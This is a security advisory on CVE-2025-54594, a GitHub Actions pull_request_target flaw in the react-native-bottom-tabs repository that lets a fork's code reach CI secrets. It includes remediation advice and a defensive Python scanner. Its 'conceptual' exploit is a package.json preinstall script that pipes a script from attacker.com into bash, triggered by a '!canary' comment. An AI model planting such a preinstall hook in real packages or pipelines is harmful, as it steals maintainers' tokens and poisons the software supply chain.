Overview
A critical vulnerability, tracked as CVE-2025-54594, has been identified in the GitHub repository of react-native-bottom-tabs, a popular library for creating bottom tabs in React Native applications. The flaw is not in the library’s runtime code but in the repository’s GitHub Actions configuration: a pull request from a fork could get its code executed in a privileged workflow context with access to the project’s CI secrets. That puts the maintainers’ repository and npm publishing credentials at risk, and through them every application that installs the package, so it is a software-supply-chain issue for developers and end-users alike.
Vulnerability Summary
CVE ID: CVE-2025-54594
Severity: Critical – 9.1 CVSS score
Attack Vector: Network
Privileges Required: None
User Interaction: Required
Impact: Exfiltration of CI secrets (GITHUB_TOKEN, NPM_TOKEN); malicious commits to the repository or compromised package releases made with those tokens
Affected Products
Product | Affected Versions
react-native-bottom-tabs | 0.9.2 and below
How the Exploit Works
The vulnerability lies in the repository’s GitHub Actions workflows rather than in the published library code. Specifically, the ‘release-canary.yml’ workflow used the ‘pull_request_target’ event trigger. Unlike ‘pull_request’, ‘pull_request_target’ runs the workflow definition from the base branch with the base repository’s secrets and a write-capable GITHUB_TOKEN, even for pull requests opened from forks. That is only safe when the workflow never executes the pull request’s own code. Because this workflow checked out the pull request’s code and ran a package install on it, untrusted code from a fork executed in that privileged context.
An attacker can exploit this by opening a pull request whose ‘package.json’ carries a malicious ‘preinstall’ script, which the package manager runs automatically during install. The attacker then triggers the vulnerable workflow by posting the comment ‘!canary’ on the pull request. The script runs on the CI runner with the job’s environment, so it can read and exfiltrate secrets such as GITHUB_TOKEN and NPM_TOKEN. With those tokens the attacker could push commits to the repository or publish a tampered version of the package to the npm registry, reaching every project that installs it.
Conceptual Example Code
The following conceptual example demonstrates how an attacker might exploit this vulnerability:
Malicious preinstall script in package.json:

```json
{
  "name": "exploit",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "preinstall": "curl https://attacker.com/steal_secrets.sh | bash"
  },
  "author": "",
  "license": "ISC"
}
```
Then, the attacker would comment ‘!canary’ on the pull request to trigger the vulnerable workflow.
Mitigation and Remediation
A remediation commit exists that removes the ‘release-canary.yml’ workflow, but at the time of writing no package release carries a corresponding fix. Note what that means: the flaw was in the repository’s CI configuration, so there is no version that downstream consumers can simply upgrade to, and network-layer controls such as a Web Application Firewall or Intrusion Detection System do not help, because the exploit runs entirely inside the project’s CI. For maintainers of the project (or of any fork that carried the same workflow), the fix is to remove or disable the workflow, rotate NPM_TOKEN and any other secret the job could read, and audit recent commits and published versions for tampering. Consumers should pin react-native-bottom-tabs to a reviewed version in their lockfile and watch for unexpected releases.
Repository owners should also review their own GitHub Actions workflows so that code from forked pull requests can never run in a privileged context: prefer the ‘pull_request’ trigger, which gives fork pull requests a read-only token and no secrets; if ‘pull_request_target’ must be used, never check out the pull request’s head and never run package installs or build tools on it in that job; set ‘permissions’ to the minimum the job needs; and pass ‘--ignore-scripts’ to package installs where lifecycle scripts are not required.
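To make the pattern from “How the Exploit Works” and the review advice above concrete, here is an added example (not code from the react-native-bottom-tabs project or from the original post): a small heuristic scanner that classifies a workflow file as a “pwn request” when it combines a ‘pull_request_target’ trigger with a checkout of the pull request’s head, and escalates the rating when a package install runs with lifecycle scripts enabled and secrets are referenced. The two workflow texts embedded in it are constructed illustrations of the weak and the corrected shape; they are not the project’s real ‘release-canary.yml’, and the comment gate the post describes is deliberately left out. The regexes are an assumption of this example, not a full YAML parser.

```python
# Added example (not code from the react-native-bottom-tabs project or from the
# original post): a heuristic scanner for the "pwn request" pattern described
# above. The two workflow texts are constructed illustrations of the weak and
# the corrected shape, not the project's real release-canary.yml.
import re
from dataclasses import dataclass

# Constructed: the weak shape. pull_request_target runs with the base repo's
# secrets and a write-capable GITHUB_TOKEN; checking out the PR head and then
# running an install hands those secrets to the fork's preinstall script.
VULNERABLE_WORKFLOW = """\
name: release-canary
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  canary:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: yarn install
      - run: npm publish --tag canary
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

# Constructed: the corrected shape. pull_request gives fork PRs a read-only
# token and no secrets, so nothing worth stealing is in the job; lifecycle
# scripts are disabled as defence in depth. Publishing is not something a
# fork-triggered job can do safely, so that step is gone.
HARDENED_WORKFLOW = """\
name: canary-build
on:
  pull_request:
permissions:
  contents: read
jobs:
  canary:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: yarn install --ignore-scripts
      - run: yarn build
"""

# Heuristic regexes (an assumption of this example, not a complete YAML parser).
PRIVILEGED_TRIGGER_RE = re.compile(
    r"^on:\s*(?:\[[^\]]*)?\bpull_request_target\b|^\s+pull_request_target\s*:", re.M)
PR_HEAD_CHECKOUT_RE = re.compile(
    r"ref:\s*\$\{\{\s*github\.event\.pull_request\.head\.(?:sha|ref)\s*\}\}|refs/pull/\S+")
INSTALL_RE = re.compile(
    r"^\s*-?\s*run:.*\b(?:npm\s+(?:ci|i|install)|yarn(?:\s+install)?|pnpm\s+(?:i|install))\b", re.M)
IGNORE_SCRIPTS_RE = re.compile(r"--ignore-scripts\b")
SECRET_RE = re.compile(r"secrets\.\w+")


@dataclass(frozen=True)
class Finding:
    privileged_trigger: bool    # workflow runs on pull_request_target
    checks_out_pr_head: bool    # checkout step pins ref to the PR's head
    runs_install_scripts: bool  # package install without --ignore-scripts
    exposes_secrets: bool       # secrets.* referenced anywhere in the file

    @property
    def is_pwn_request(self) -> bool:
        # Untrusted code executing in the privileged context needs both halves.
        return self.privileged_trigger and self.checks_out_pr_head

    def risk(self) -> str:
        if not self.is_pwn_request:
            return "none"
        if self.runs_install_scripts and self.exposes_secrets:
            return "critical"  # preinstall script runs with named secrets in env
        return "high"          # still executes fork code with a write token


def scan_workflow(text: str) -> Finding:
    """Classify one workflow file's text against the pwn-request pattern."""
    return Finding(
        privileged_trigger=bool(PRIVILEGED_TRIGGER_RE.search(text)),
        checks_out_pr_head=bool(PR_HEAD_CHECKOUT_RE.search(text)),
        runs_install_scripts=bool(INSTALL_RE.search(text)) and not IGNORE_SCRIPTS_RE.search(text),
        exposes_secrets=bool(SECRET_RE.search(text)),
    )


if __name__ == "__main__":
    for label, wf in (("vulnerable", VULNERABLE_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        f = scan_workflow(wf)
        print(f"{label}: risk={f.risk()} {f}")
```

Run it against the files under ‘.github/workflows/’ of any repository you maintain by reading each file into ‘scan_workflow’. A ‘privileged_trigger’ without ‘checks_out_pr_head’ is rated “none” on purpose: ‘pull_request_target’ is legitimate for jobs such as labelling, as long as the fork’s code never reaches the runner.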